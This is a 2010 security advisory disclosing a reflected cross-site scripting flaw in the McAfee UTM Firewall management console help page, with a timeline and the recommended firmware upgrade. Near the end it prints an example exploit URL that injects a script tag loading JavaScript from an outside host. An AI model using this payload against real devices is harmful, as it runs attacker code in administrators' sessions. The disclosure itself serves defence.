McAfee UTM Firewall firmware versions 3.0.0 through 4.0.6 suffer from a cross site scripting vulnerability.
d74a18c2c94d3ec9137055c30cb90322d16fe5992676d7772281967380bf88d1
Advisory Information
Advisory ID: NGENUITY-2010-005
Date published: 6/9/2010
Vulnerability Information
Class: Reflected Cross-Site Scripting (XSS)
Software Description
McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) (formerly SnapGear) is the
affected product line. More information can be found at
https://kc.mcafee.com/corporate/index?page=content&id=SB10010
<http://www.mcafee.com/us/enterprise/products/network_security/utm_firewall.html>
Vulnerability Description
The help feature of the McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6)
management console is vulnerable to reflected cross-site scripting.
It could allow an attacker to cause a user to execute attacker-supplied
Javascript code. This attack requires the target to have an existing
valid session logged into the UTM device and that the attacker know the
internal IP address for the UTM device.
McAfee recommends upgrading to UTM Firewall Firmware 4.0.7 to mitigate
this vulnerability
*Timeline:
*
1/21/2010 - McAfee notified of vulnerability, provided with proof of concept
6/9/2010 - McAfee notified nGenuity of available fix and related information
Technical Description
*Example Exploit URL:
*
hxxp://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block><script
src=http://example.com/xss.js></script>
Original Posting:
http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cross-site-scripting/